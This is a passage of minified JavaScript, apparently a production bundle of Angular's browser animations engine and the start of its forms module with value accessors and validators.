Map,yt=xO(te,Array.from(et));yt.forEach((Di,Pi)=>{const Oi=l4+Fe++;Ze.set(Pi,Oi),Di.forEach($i=>vd($i,Oi))}),a.push(()=>{pe.forEach((Di,Pi)=>{const Oi=Re.get(Pi);Di.forEach($i=>g1($i,Oi))}),yt.forEach((Di,Pi)=>{const Oi=Ze.get(Pi);Di.forEach($i=>g1($i,Oi))}),Ne.forEach(Di=>{this.processLeaveNode(Di)})});const It=[],St=[];for(let Di=this._namespaceList.length-1;Di>=0;Di--)this._namespaceList[Di].drainQueuedTransitions(e).forEach(Oi=>{const $i=Oi.player,Na=Oi.element;if(It.push($i),this.collectedEnterElements.length){const bn=Na[Md];if(bn&&bn.setForMove){if(bn.previousTriggersValues&&bn.previousTriggersValues.has(Oi.triggerName)){const Kr=bn.previousTriggersValues.get(Oi.triggerName),Li=this.statesByElement.get(Oi.element);if(Li&&Li.has(Oi.triggerName)){const Fa=Li.get(Oi.triggerName);Fa.value=Kr,Li.set(Oi.triggerName,Fa)}}return void $i.destroy()}}const jn=!Y||!this.driver.containsElement(Y,Na),yn=Ze.get(Na),$r=Re.get(Na),to=this._buildInstruction(Oi,i,$r,yn,jn);if(to.errors&&to.errors.length)return void St.push(to);if(jn)return $i.onStart(()=>sg(Na,to.fromStyles)),$i.onDestroy(()=>cu(Na,to.toStyles)),void n.push($i);if(Oi.isFallbackTransition)return $i.onStart(()=>sg(Na,to.fromStyles)),$i.onDestroy(()=>cu(Na,to.toStyles)),void n.push($i);const rl=[];to.timelines.forEach(bn=>{bn.stretchStartingKeyframe=!0,this.disabledNodes.has(bn.element)||rl.push(bn)}),to.timelines=rl,i.append(Na,to.timelines),c.push({instruction:to,player:$i,element:Na}),to.queriedElements.forEach(bn=>Gl(d,bn,[]).push($i)),to.preStyleProps.forEach((bn,Kr)=>{if(bn.size){let Li=T.get(Kr);Li||T.set(Kr,Li=new Set),bn.forEach((Fa,Fn)=>Li.add(Fn))}}),to.postStyleProps.forEach((bn,Kr)=>{let Li=k.get(Kr);Li||k.set(Kr,Li=new Set),bn.forEach((Fa,Fn)=>Li.add(Fn))})});if(St.length){const Di=[];St.forEach(Pi=>{Di.push(function Sce(t,a){return new gi(3505,!1)}())}),It.forEach(Pi=>Pi.destroy()),this.reportError(Di)}const Nt=new Map,oi=new Map;c.forEach(Di=>{const Pi=Di.element;i.has(Pi)&&(oi.set(Pi,Pi),this._beforeAnimationBuild(Di.player.namespaceId,Di.instruction,Nt))}),n.forEach(Di=>{const Pi=Di.element;this._getPreviousPlayers(Pi,!1,Di.namespaceId,Di.triggerName,null).forEach($i=>{Gl(Nt,Pi,[]).push($i),$i.destroy()})});const Ai=Ne.filter(Di=>IO(Di,T,k)),vi=new Map;DO(vi,this.driver,ut,k,wh).forEach(Di=>{IO(Di,T,k)&&Ai.push(Di)});const Za=new Map;pe.forEach((Di,Pi)=>{DO(Za,this.driver,new Set(Di),T,"!")}),Ai.forEach(Di=>{var Pi,Oi;const $i=vi.get(Di),Na=Za.get(Di);vi.set(Di,new Map([...Array.from(null!==(Pi=null==$i?void 0:$i.entries())&&void 0!==Pi?Pi:[]),...Array.from(null!==(Oi=null==Na?void 0:Na.entries())&&void 0!==Oi?Oi:[])]))});const wa=[],en=[],Vo={};c.forEach(Di=>{const{element:Pi,player:Oi,instruction:$i}=Di;if(i.has(Pi)){if(q.has(Pi))return Oi.onDestroy(()=>cu(Pi,$i.toStyles)),Oi.disabled=!0,Oi.overrideTotalTime($i.totalTime),void n.push(Oi);let Na=Vo;if(oi.size>1){let yn=Pi;const $r=[];for(;yn=yn.parentNode;){const to=oi.get(yn);if(to){Na=to;break}$r.push(yn)}$r.forEach(to=>oi.set(to,Na))}const jn=this._buildAnimation(Oi.namespaceId,$i,Nt,r,Za,vi);if(Oi.setRealPlayer(jn),Na===Vo)wa.push(Oi);else{const yn=this.playersByElement.get(Na);yn&&yn.length&&(Oi.parentPlayer=tp(yn)),n.push(Oi)}}else sg(Pi,$i.fromStyles),Oi.onDestroy(()=>cu(Pi,$i.toStyles)),en.push(Oi),q.has(Pi)&&n.push(Oi)}),en.forEach(Di=>{const Pi=r.get(Di.element);if(Pi&&Pi.length){const Oi=tp(Pi);Di.setRealPlayer(Oi)}}),n.forEach(Di=>{Di.parentPlayer?Di.syncPlayerEvents(Di.parentPlayer):Di.destroy()});for(let Di=0;Di<Ne.length;Di++){const Pi=Ne[Di],Oi=Pi[Md];if(g1(Pi,l4),Oi&&Oi.hasAnimation)continue;let $i=[];if(d.size){let jn=d.get(Pi);jn&&jn.length&&$i.push(...jn);let yn=this.driver.query(Pi,R6,!0);for(let $r=0;$r<yn.length;$r++){let to=d.get(yn[$r]);to&&to.length&&$i.push(...to)}}const Na=$i.filter(jn=>!jn.destroyed);Na.length?Ole(this,Pi,Na):this.processLeaveNode(Pi)}return Ne.length=0,wa.forEach(Di=>{this.players.push(Di),Di.onDone(()=>{Di.destroy();const Pi=this.players.indexOf(Di);this.players.splice(Pi,1)}),Di.play()}),wa}elementContainsData(a,e){let i=!1;const n=e[Md];return n&&n.setForRemoval&&(i=!0),this.playersByElement.has(e)&&(i=!0),this.playersByQueriedElement.has(e)&&(i=!0),this.statesByElement.has(e)&&(i=!0),this._fetchNamespace(a).elementContainsData(e)||i}afterFlush(a){this._flushFns.push(a)}afterFlushAnimationsDone(a){this._whenQuietFns.push(a)}_getPreviousPlayers(a,e,i,n,r){let c=[];if(e){const d=this.playersByQueriedElement.get(a);d&&(c=d)}else{const d=this.playersByElement.get(a);if(d){const T=!r||r==hy;d.forEach(k=>{k.queued||!T&&k.triggerName!=n||c.push(k)})}}return(i||n)&&(c=c.filter(d=>!(i&&i!=d.namespaceId||n&&n!=d.triggerName))),c}_beforeAnimationBuild(a,e,i){const r=e.element,c=e.isRemovalTransition?void 0:a,d=e.isRemovalTransition?void 0:e.triggerName;for(const T of e.timelines){const k=T.element,q=k!==r,Y=Gl(i,k,[]);this._getPreviousPlayers(k,q,c,d,e.toState).forEach(pe=>{const Re=pe.getRealPlayer();Re.beforeDestroy&&Re.beforeDestroy(),pe.destroy(),Y.push(pe)})}sg(r,e.fromStyles)}_buildAnimation(a,e,i,n,r,c){const d=e.triggerName,T=e.element,k=[],q=new Set,Y=new Set,te=e.timelines.map(Re=>{const Fe=Re.element;q.add(Fe);const Ne=Fe[Md];if(Ne&&Ne.removedBeforeQueried)return new ly(Re.duration,Re.delay);const et=Fe!==T,ut=function Nle(t){const a=[];return wO(t,a),a}((i.get(Fe)||xle).map(Nt=>Nt.getRealPlayer())).filter(Nt=>!!Nt.element&&Nt.element===Fe),Ze=r.get(Fe),yt=c.get(Fe),It=eO(0,this._normalizer,0,Re.keyframes,Ze,yt),St=this._buildPlayer(Re,It,ut);if(Re.subTimeline&&n&&Y.add(Fe),et){const Nt=new q6(a,d,Fe);Nt.setRealPlayer(St),k.push(Nt)}return St});k.forEach(Re=>{Gl(this.playersByQueriedElement,Re.element,[]).push(Re),Re.onDone(()=>function Sle(t,a,e){let i=t.get(a);if(i){if(i.length){const n=i.indexOf(e);i.splice(n,1)}0==i.length&&t.delete(a)}return i}(this.playersByQueriedElement,Re.element,Re))}),q.forEach(Re=>vd(Re,lO));const pe=tp(te);return pe.onDestroy(()=>{q.forEach(Re=>g1(Re,lO)),cu(T,e.toStyles)}),Y.forEach(Re=>{Gl(n,Re,[]).push(pe)}),pe}_buildPlayer(a,e,i){return e.length>0?this.driver.animate(a.element,e,a.duration,a.delay,a.easing,i):new ly(a.duration,a.delay)}}class q6{constructor(a,e,i){this.namespaceId=a,this.triggerName=e,this.element=i,this._player=new ly,this._containsRealPlayer=!1,this._queuedCallbacks=new Map,this.destroyed=!1,this.markedForDestroy=!1,this.disabled=!1,this.queued=!0,this.totalTime=0}setRealPlayer(a){this._containsRealPlayer||(this._player=a,this._queuedCallbacks.forEach((e,i)=>{e.forEach(n=>A6(a,i,void 0,n))}),this._queuedCallbacks.clear(),this._containsRealPlayer=!0,this.overrideTotalTime(a.totalTime),this.queued=!1)}getRealPlayer(){return this._player}overrideTotalTime(a){this.totalTime=a}syncPlayerEvents(a){const e=this._player;e.triggerCallback&&a.onStart(()=>e.triggerCallback("start")),a.onDone(()=>this.finish()),a.onDestroy(()=>this.destroy())}_queueEvent(a,e){Gl(this._queuedCallbacks,a,[]).push(e)}onDone(a){this.queued&&this._queueEvent("done",a),this._player.onDone(a)}onStart(a){this.queued&&this._queueEvent("start",a),this._player.onStart(a)}onDestroy(a){this.queued&&this._queueEvent("destroy",a),this._player.onDestroy(a)}init(){this._player.init()}hasStarted(){return!this.queued&&this._player.hasStarted()}play(){!this.queued&&this._player.play()}pause(){!this.queued&&this._player.pause()}restart(){!this.queued&&this._player.restart()}finish(){this._player.finish()}destroy(){this.destroyed=!0,this._player.destroy()}reset(){!this.queued&&this._player.reset()}setPosition(a){this.queued||this._player.setPosition(a)}getPosition(){return this.queued?0:this._player.getPosition()}triggerCallback(a){const e=this._player;e.triggerCallback&&e.triggerCallback(a)}}function v4(t){return t&&1===t.nodeType}function EO(t,a){const e=t.style.display;return t.style.display=null!=a?a:"none",e}function DO(t,a,e,i,n){const r=[];e.forEach(T=>r.push(EO(T)));const c=[];i.forEach((T,k)=>{const q=new Map;T.forEach(Y=>{const te=a.computeStyle(k,Y,n);q.set(Y,te),(!te||0==te.length)&&(k[Md]=wle,c.push(k))}),t.set(k,q)});let d=0;return e.forEach(T=>EO(T,r[d++])),c}function xO(t,a){const e=new Map;if(t.forEach(d=>e.set(d,[])),0==a.length)return e;const n=new Set(a),r=new Map;function c(d){if(!d)return 1;let T=r.get(d);if(T)return T;const k=d.parentNode;return T=e.has(k)?k:n.has(k)?1:c(k),r.set(d,T),T}return a.forEach(d=>{const T=c(d);1!==T&&e.get(T).push(d)}),e}function vd(t,a){var e;null===(e=t.classList)||void 0===e||e.add(a)}function g1(t,a){var e;null===(e=t.classList)||void 0===e||e.remove(a)}function Ole(t,a,e){tp(e).onDone(()=>t.processLeaveNode(a))}function wO(t,a){for(let e=0;e<t.length;e++){const i=t[e];i instanceof YP?wO(i.players,a):a.push(i)}}function IO(t,a,e){const i=e.get(t);if(!i)return!1;let n=a.get(t);return n?i.forEach(r=>n.add(r)):a.set(t,i),e.delete(t),!0}class A4{constructor(a,e,i){this.bodyNode=a,this._driver=e,this._normalizer=i,this._triggerCache={},this.onRemovalComplete=(n,r)=>{},this._transitionEngine=new Rle(a,e,i),this._timelineEngine=new vle(a,e,i),this._transitionEngine.onRemovalComplete=(n,r)=>this.onRemovalComplete(n,r)}registerTrigger(a,e,i,n,r){const c=a+"-"+n;let d=this._triggerCache[c];if(!d){const T=[],q=O6(this._driver,r,T,[]);if(T.length)throw function bce(t,a){return new gi(3404,!1)}();d=function Cle(t,a,e){return new yle(t,a,e)}(n,q,this._normalizer),this._triggerCache[c]=d}this._transitionEngine.registerTrigger(e,n,d)}register(a,e){this._transitionEngine.register(a,e)}destroy(a,e){this._transitionEngine.destroy(a,e)}onInsert(a,e,i,n){this._transitionEngine.insertNode(a,e,i,n)}onRemove(a,e,i,n){this._transitionEngine.removeNode(a,e,n||!1,i)}disableAnimations(a,e){this._transitionEngine.markElementAsDisabled(a,e)}process(a,e,i,n){if("@"==i.charAt(0)){const[r,c]=tO(i);this._timelineEngine.command(r,e,c,n)}else this._transitionEngine.trigger(a,e,i,n)}listen(a,e,i,n,r){if("@"==i.charAt(0)){const[c,d]=tO(i);return this._timelineEngine.listen(c,e,d,r)}return this._transitionEngine.listen(a,e,i,n,r)}flush(a=-1){this._transitionEngine.flush(a)}get players(){return this._transitionEngine.players.concat(this._timelineEngine.players)}whenRenderingDone(){return this._transitionEngine.whenRenderingDone()}}let Wle=(()=>{class t{constructor(e,i,n){this._element=e,this._startStyles=i,this._endStyles=n,this._state=0;let r=t.initialStylesByElement.get(e);r||t.initialStylesByElement.set(e,r=new Map),this._initialStyles=r}start(){this._state<1&&(this._startStyles&&cu(this._element,this._startStyles,this._initialStyles),this._state=1)}finish(){this.start(),this._state<2&&(cu(this._element,this._initialStyles),this._endStyles&&(cu(this._element,this._endStyles),this._endStyles=null),this._state=1)}destroy(){this.finish(),this._state<3&&(t.initialStylesByElement.delete(this._element),this._startStyles&&(sg(this._element,this._startStyles),this._endStyles=null),this._endStyles&&(sg(this._element,this._endStyles),this._endStyles=null),cu(this._element,this._initialStyles),this._state=3)}}return t.initialStylesByElement=new WeakMap,t})();function G6(t){let a=null;return t.forEach((e,i)=>{(function Fle(t){return"display"===t||"position"===t})(i)&&(a=a||new Map,a.set(i,e))}),a}class RO{constructor(a,e,i,n){this.element=a,this.keyframes=e,this.options=i,this._specialStyles=n,this._onDoneFns=[],this._onStartFns=[],this._onDestroyFns=[],this._initialized=!1,this._finished=!1,this._started=!1,this._destroyed=!1,this._originalOnDoneFns=[],this._originalOnStartFns=[],this.time=0,this.parentPlayer=null,this.currentSnapshot=new Map,this._duration=i.duration,this._delay=i.delay||0,this.time=this._duration+this._delay}_onFinish(){this._finished||(this._finished=!0,this._onDoneFns.forEach(a=>a()),this._onDoneFns=[])}init(){this._buildPlayer(),this._preparePlayerBeforeStart()}_buildPlayer(){if(this._initialized)return;this._initialized=!0;const a=this.keyframes;this.domPlayer=this._triggerWebAnimation(this.element,a,this.options),this._finalKeyframe=a.length?a[a.length-1]:new Map,this.domPlayer.addEventListener("finish",()=>this._onFinish())}_preparePlayerBeforeStart(){this._delay?this._resetDomPlayerState():this.domPlayer.pause()}_convertKeyframesToObject(a){const e=[];return a.forEach(i=>{e.push(Object.fromEntries(i))}),e}_triggerWebAnimation(a,e,i){return a.animate(this._convertKeyframesToObject(e),i)}onStart(a){this._originalOnStartFns.push(a),this._onStartFns.push(a)}onDone(a){this._originalOnDoneFns.push(a),this._onDoneFns.push(a)}onDestroy(a){this._onDestroyFns.push(a)}play(){this._buildPlayer(),this.hasStarted()||(this._onStartFns.forEach(a=>a()),this._onStartFns=[],this._started=!0,this._specialStyles&&this._specialStyles.start()),this.domPlayer.play()}pause(){this.init(),this.domPlayer.pause()}finish(){this.init(),this._specialStyles&&this._specialStyles.finish(),this._onFinish(),this.domPlayer.finish()}reset(){this._resetDomPlayerState(),this._destroyed=!1,this._finished=!1,this._started=!1,this._onStartFns=this._originalOnStartFns,this._onDoneFns=this._originalOnDoneFns}_resetDomPlayerState(){this.domPlayer&&this.domPlayer.cancel()}restart(){this.reset(),this.play()}hasStarted(){return this._started}destroy(){this._destroyed||(this._destroyed=!0,this._resetDomPlayerState(),this._onFinish(),this._specialStyles&&this._specialStyles.destroy(),this._onDestroyFns.forEach(a=>a()),this._onDestroyFns=[])}setPosition(a){void 0===this.domPlayer&&this.init(),this.domPlayer.currentTime=a*this.time}getPosition(){return this.domPlayer.currentTime/this.time}get totalTime(){return this._delay+this._duration}beforeDestroy(){const a=new Map;this.hasStarted()&&this._finalKeyframe.forEach((i,n)=>{"offset"!==n&&a.set(n,this._finished?i:pO(this.element,n))}),this.currentSnapshot=a}triggerCallback(a){const e="start"===a?this._onStartFns:this._onDoneFns;e.forEach(i=>i()),e.length=0}}class Vle{validateStyleProperty(a){return!0}validateAnimatableStyleProperty(a){return!0}matchesElement(a,e){return!1}containsElement(a,e){return oO(a,e)}getParentElement(a){return x6(a)}query(a,e,i){return rO(a,e,i)}computeStyle(a,e,i){return window.getComputedStyle(a)[e]}animate(a,e,i,n,r,c=[]){const T={duration:i,delay:n,fill:0==n?"both":"forwards"};r&&(T.easing=r);const k=new Map,q=c.filter(pe=>pe instanceof RO);(function qce(t,a){return 0===t||0===a})(i,n)&&q.forEach(pe=>{pe.currentSnapshot.forEach((Re,Fe)=>k.set(Fe,Re))});let Y=function Vce(t){return t.length?t[0]instanceof Map?t:t.map(a=>dO(a)):[]}(e).map(pe=>ip(pe));Y=function Gce(t,a,e){if(e.size&&a.length){let i=a[0],n=[];if(e.forEach((r,c)=>{i.has(c)||n.push(c),i.set(c,r)}),n.length)for(let r=1;r<a.length;r++){let c=a[r];n.forEach(d=>c.set(d,pO(t,d)))}}return a}(a,Y,k);const te=function zle(t,a){let e=null,i=null;return Array.isArray(a)&&a.length?(e=G6(a[0]),a.length>1&&(i=G6(a[a.length-1]))):a instanceof Map&&(e=G6(a)),e||i?new Wle(t,e,i):null}(a,Y);return new RO(a,Y,T,te)}}let Ble=(()=>{class t extends QP{constructor(e,i){super(),this._nextAnimationId=0,this._renderer=e.createRenderer(i.body,{id:"0",encapsulation:dc.None,styles:[],data:{animation:[]}})}build(e){const i=this._nextAnimationId.toString();this._nextAnimationId++;const n=Array.isArray(e)?KP(e):e;return SO(this._renderer,null,i,"register",[n]),new Hle(i,this._renderer)}}return t.\u0275fac=function(e){return new(e||t)(At(qs),At(ga))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();class Hle extends class Jse{}{constructor(a,e){super(),this._id=a,this._renderer=e}create(a,e){return new Ule(this._id,a,e||{},this._renderer)}}class Ule{constructor(a,e,i,n){this.id=a,this.element=e,this._renderer=n,this.parentPlayer=null,this._started=!1,this.totalTime=0,this._command("create",i)}_listen(a,e){return this._renderer.listen(this.element,`@@${this.id}:${a}`,e)}_command(a,...e){return SO(this._renderer,this.element,this.id,a,e)}onDone(a){this._listen("done",a)}onStart(a){this._listen("start",a)}onDestroy(a){this._listen("destroy",a)}init(){this._command("init")}hasStarted(){return this._started}play(){this._command("play"),this._started=!0}pause(){this._command("pause")}restart(){this._command("restart")}finish(){this._command("finish")}destroy(){this._command("destroy")}reset(){this._command("reset"),this._started=!1}setPosition(a){this._command("setPosition",a)}getPosition(){var a,e;return null!==(e=null===(a=this._renderer.engine.players[+this.id])||void 0===a?void 0:a.getPosition())&&void 0!==e?e:0}}function SO(t,a,e,i,n){return t.setProperty(a,`@@${e}:${i}`,n)}const kO="@.disabled";let qle=(()=>{class t{constructor(e,i,n){this.delegate=e,this.engine=i,this._zone=n,this._currentId=0,this._microtaskId=1,this._animationCallbacksBuffer=[],this._rendererCache=new Map,this._cdRecurDepth=0,this.promise=Promise.resolve(0),i.onRemovalComplete=(r,c)=>{const d=null==c?void 0:c.parentNode(r);d&&c.removeChild(d,r)}}createRenderer(e,i){const r=this.delegate.createRenderer(e,i);if(!(e&&i&&i.data&&i.data.animation)){let q=this._rendererCache.get(r);return q||(q=new PO("",r,this.engine),this._rendererCache.set(r,q)),q}const c=i.id,d=i.id+"-"+this._currentId;this._currentId++,this.engine.register(d,e);const T=q=>{Array.isArray(q)?q.forEach(T):this.engine.registerTrigger(c,d,e,q.name,q)};return i.data.animation.forEach(T),new Gle(this,d,r,this.engine)}begin(){this._cdRecurDepth++,this.delegate.begin&&this.delegate.begin()}_scheduleCountTask(){this.promise.then(()=>{this._microtaskId++})}scheduleListenerCallback(e,i,n){e>=0&&e<this._microtaskId?this._zone.run(()=>i(n)):(0==this._animationCallbacksBuffer.length&&Promise.resolve(null).then(()=>{this._zone.run(()=>{this._animationCallbacksBuffer.forEach(r=>{const[c,d]=r;c(d)}),this._animationCallbacksBuffer=[]})}),this._animationCallbacksBuffer.push([i,n]))}end(){this._cdRecurDepth--,0==this._cdRecurDepth&&this._zone.runOutsideAngular(()=>{this._scheduleCountTask(),this.engine.flush(this._microtaskId)}),this.delegate.end&&this.delegate.end()}whenRenderingDone(){return this.engine.whenRenderingDone()}}return t.\u0275fac=function(e){return new(e||t)(At(qs),At(A4),At(qi))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();class PO{constructor(a,e,i){this.namespaceId=a,this.delegate=e,this.engine=i,this.destroyNode=this.delegate.destroyNode?n=>e.destroyNode(n):null}get data(){return this.delegate.data}destroy(){this.engine.destroy(this.namespaceId,this.delegate),this.delegate.destroy()}createElement(a,e){return this.delegate.createElement(a,e)}createComment(a){return this.delegate.createComment(a)}createText(a){return this.delegate.createText(a)}appendChild(a,e){this.delegate.appendChild(a,e),this.engine.onInsert(this.namespaceId,e,a,!1)}insertBefore(a,e,i,n=!0){this.delegate.insertBefore(a,e,i),this.engine.onInsert(this.namespaceId,e,a,n)}removeChild(a,e,i){this.engine.onRemove(this.namespaceId,e,this.delegate,i)}selectRootElement(a,e){return this.delegate.selectRootElement(a,e)}parentNode(a){return this.delegate.parentNode(a)}nextSibling(a){return this.delegate.nextSibling(a)}setAttribute(a,e,i,n){this.delegate.setAttribute(a,e,i,n)}removeAttribute(a,e,i){this.delegate.removeAttribute(a,e,i)}addClass(a,e){this.delegate.addClass(a,e)}removeClass(a,e){this.delegate.removeClass(a,e)}setStyle(a,e,i,n){this.delegate.setStyle(a,e,i,n)}removeStyle(a,e,i){this.delegate.removeStyle(a,e,i)}setProperty(a,e,i){"@"==e.charAt(0)&&e==kO?this.disableAnimations(a,!!i):this.delegate.setProperty(a,e,i)}setValue(a,e){this.delegate.setValue(a,e)}listen(a,e,i){return this.delegate.listen(a,e,i)}disableAnimations(a,e){this.engine.disableAnimations(a,e)}}class Gle extends PO{constructor(a,e,i,n){super(e,i,n),this.factory=a,this.namespaceId=e}setProperty(a,e,i){"@"==e.charAt(0)?"."==e.charAt(1)&&e==kO?this.disableAnimations(a,i=void 0===i||!!i):this.engine.process(this.namespaceId,a,e.slice(1),i):this.delegate.setProperty(a,e,i)}listen(a,e,i){if("@"==e.charAt(0)){const n=function jle(t){switch(t){case"body":return document.body;case"document":return document;case"window":return window;default:return t}}(a);let r=e.slice(1),c="";return"@"!=r.charAt(0)&&([r,c]=function Qle(t){const a=t.indexOf(".");return[t.substring(0,a),t.slice(a+1)]}(r)),this.engine.listen(this.namespaceId,n,r,c,d=>{this.factory.scheduleListenerCallback(d._data||-1,i,d)})}return this.delegate.listen(a,e,i)}}const OO=[{provide:QP,useClass:Ble},{provide:F6,useFactory:function Kle(){return new fle}},{provide:A4,useClass:(()=>{class t extends A4{constructor(e,i,n,r){super(e.body,i,n)}ngOnDestroy(){this.flush()}}return t.\u0275fac=function(e){return new(e||t)(At(ga),At(w6),At(F6),At(Jf))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})()},{provide:qs,useFactory:function Xle(t,a,e){return new qle(t,a,e)},deps:[r4,A4,qi]}],j6=[{provide:w6,useFactory:()=>new Vle},{provide:ir,useValue:"BrowserAnimations"},...OO],NO=[{provide:w6,useClass:sO},{provide:ir,useValue:"NoopAnimations"},...OO];let Yle=(()=>{class t{static withConfig(e){return{ngModule:t,providers:e.disableAnimations?NO:j6}}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:j6,imports:[HP]}),t})();const{isArray:Jle}=Array,{getPrototypeOf:Zle,prototype:ede,keys:tde}=Object;function LO(t){if(1===t.length){const a=t[0];if(Jle(a))return{args:a,keys:null};if(function ide(t){return t&&"object"==typeof t&&Zle(t)===ede}(a)){const e=tde(a);return{args:e.map(i=>a[i]),keys:e}}}return{args:t,keys:null}}const{isArray:ade}=Array;function Q6(t){return Xe(a=>function nde(t,a){return ade(a)?t(...a):t(a)}(t,a))}function zO(t,a){return t.reduce((e,i,n)=>(e[i]=a[n],e),{})}function $6(...t){const a=yo(t),{args:e,keys:i}=LO(t),n=new G(r=>{const{length:c}=e;if(!c)return void r.complete();const d=new Array(c);let T=c,k=c;for(let q=0;q<c;q++){let Y=!1;pn(e[q]).subscribe(Ae(r,te=>{Y||(Y=!0,k--),d[q]=te},()=>T--,void 0,()=>{(!T||!Y)&&(k||r.next(i?zO(i,d):d),r.complete())}))}});return a?n.pipe(Q6(a)):n}let WO=(()=>{class t{constructor(e,i){this._renderer=e,this._elementRef=i,this.onChange=n=>{},this.onTouched=()=>{}}setProperty(e,i){this._renderer.setProperty(this._elementRef.nativeElement,e,i)}registerOnTouched(e){this.onTouched=e}registerOnChange(e){this.onChange=e}setDisabledState(e){this.setProperty("disabled",e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(wr),Ee(mi))},t.\u0275dir=Ot({type:t}),t})(),lg=(()=>{class t extends WO{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,features:[ci]}),t})();const Ls=new ni("NgValueAccessor"),rde={provide:Ls,useExisting:ja(()=>an),multi:!0},cde=new ni("CompositionEventMode");let an=(()=>{class t extends WO{constructor(e,i,n){super(e,i),this._compositionMode=n,this._composing=!1,null==this._compositionMode&&(this._compositionMode=!function sde(){const t=su()?su().getUserAgent():"";return/android (\d+)/.test(t.toLowerCase())}())}writeValue(e){this.setProperty("value",null==e?"":e)}_handleInput(e){(!this._compositionMode||this._compositionMode&&!this._composing)&&this.onChange(e)}_compositionStart(){this._composing=!0}_compositionEnd(e){this._composing=!1,this._compositionMode&&this.onChange(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(wr),Ee(mi),Ee(cde,8))},t.\u0275dir=Ot({type:t,selectors:[["input","formControlName","",3,"type","checkbox"],["textarea","formControlName",""],["input","formControl","",3,"type","checkbox"],["textarea","formControl",""],["input","ngModel","",3,"type","checkbox"],["textarea","ngModel",""],["","ngDefaultControl",""]],hostBindings:function(e,i){1&e&&he("input",function(r){return i._handleInput(r.target.value)})("blur",function(){return i.onTouched()})("compositionstart",function(){return i._compositionStart()})("compositionend",function(r){return i._compositionEnd(r.target.value)})},features:[ki([rde]),ci]}),t})();function ap(t){return null==t||("string"==typeof t||Array.isArray(t))&&0===t.length}function VO(t){return null!=t&&"number"==typeof t.length}const Cs=new ni("NgValidators"),np=new ni("NgAsyncValidators"),dde=/^(?=.{1,254}$)(?=.{1,64}@)[a-zA-Z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-zA-Z0-9!#$%&'*+/=?^_`{|}~-]+)*@[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?(?:\.[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*$/;class Ad{static min(a){return BO(a)}static max(a){return HO(a)}static required(a){return UO(a)}static requiredTrue(a){return function qO(t){return!0===t.value?null:{required:!0}}(a)}static email(a){return function GO(t){return ap(t.value)||dde.test(t.value)?null:{email:!0}}(a)}static minLength(a){return function jO(t){return a=>ap(a.value)||!VO(a.value)?null:a.value.length<t?{minlength:{requiredLength:t,actualLength:a.value.length}}:null}(a)}static maxLength(a){return function QO(t){return a=>VO(a.value)&&a.value.length>t?{maxlength:{requiredLength:t,actualLength:a.value.length}}:null}(a)}static pattern(a){return function $O(t){if(!t)return E4;let a,e;return"string"==typeof t?(e="","^"!==t.charAt(0)&&(e+="^"),e+=t,"$"!==t.charAt(t.length-1)&&(e+="$"),a=new RegExp(e)):(e=t.toString(),a=t),i=>{if(ap(i.value))return null;const n=i.value;return a.test(n)?null:{pattern:{requiredPattern:e,actualValue:n}}}}(a)}static nullValidator(a){return null}static compose(a){return eN(a)}static composeAsync(a){return tN(a)}}function BO(t){return a=>{if(ap(a.value)||ap(t))return null;const e=parseFloat(a.value);return!isNaN(e)&&e<t?{min:{min:t,actual:a.value}}:null}}function HO(t){return a=>{if(ap(a.value)||ap(t))return null;const e=parseFloat(a.value);return!isNaN(e)&&e>t?{max:{max:t,actual:a.value}}:null}}function UO(t){return ap(t.value)?{required:!0}:null}function E4(t){return null}function KO(t){return null!=t}function XO(t){return qC(t)?Sa(t):t}function YO(t){let a={};return t.forEach(e=>{a=null!=e?Object.assign(Object.assign({},a),e):a}),0===Object.keys(a).length?null:a}function JO(t,a){return a.map(e=>e(t))}function ZO(t){return t.map(a=>function mde(t){return!t.validate}(a)?a:e=>a.validate(e))}function eN(t){if(!t)return null;const a=t.filter(KO);return 0==a.length?null:function(e){return YO(JO(e,a))}}function K6(t){return null!=t?eN(ZO(t)):null}function tN(t){if(!t)return null;const a=t.filter(KO);return 0==a.length?null:function(e){return $6(JO(e,a).map(XO)).pipe(Xe(YO))}}function X6(t){return null!=t?tN(ZO(t)):null}function iN(t,a){return null===t?[a]:Array.isArray(t)?[...t,a]:[t,a]}function aN(t){return t._rawValidators}function nN(t){return t._rawAsyncValidators}function Y6(t){return t?Array.isArray(t)?t:[t]:[]}function D4(t,a){return Array.isArray(t)?t.includes(a):t===a}function oN(t,a){const e=Y6(a);return Y6(t).forEach(n=>{D4(e,n)||e.push(n)}),e}function rN(t,a){return Y6(a).filter(e=>!D4(t,e))}class sN{constructor(){this._rawValidators=[],this._rawAsyncValidators=[],this._onDestroyCallbacks=[]}get value(){return this.control?this.control.value:null}get valid(){return this.control?this.control.valid:null}get invalid(){return this.control?this.control.invalid:null}get pending(){return this.control?this.control.pending:null}get disabled(){return this.control?this.control.disabled:null}get enabled(){return this.control?this.control.enabled:null}get errors(){return this.control?this.control.errors:null}get pristine(){return this.control?this.control.pristine:null}get dirty(){return this.control?this.control.dirty:null}get touched(){return this.control?this.control.touched:null}get status(){return this.control?this.control.status:null}get untouched(){return this.control?this.control.untouched:null}get statusChanges(){return this.control?this.control.statusChanges:null}get valueChanges(){return this.control?this.control.valueChanges:null}get path(){return null}_setValidators(a){this._rawValidators=a||[],this._composedValidatorFn=K6(this._rawValidators)}_setAsyncValidators(a){this._rawAsyncValidators=a||[],this._composedAsyncValidatorFn=X6(this._rawAsyncValidators)}get validator(){return this._composedValidatorFn||null}get asyncValidator(){return this._composedAsyncValidatorFn||null}_registerOnDestroy(a){this._onDestroyCallbacks.push(a)}_invokeOnDestroyCallbacks(){this._onDestroyCallbacks.forEach(a=>a()),this._onDestroyCallbacks=[]}reset(a){this.control&&this.control.reset(a)}hasError(a,e){return!!this.control&&this.control.hasError(a,e)}getError(a,e){return this.control?this.control.getError(a,e):null}}class fm extends sN{constructor(){super(...arguments),this._parent=null,this.name=null,this.valueAccessor=null}}class Yc extends sN{get formDirective(){return null}get 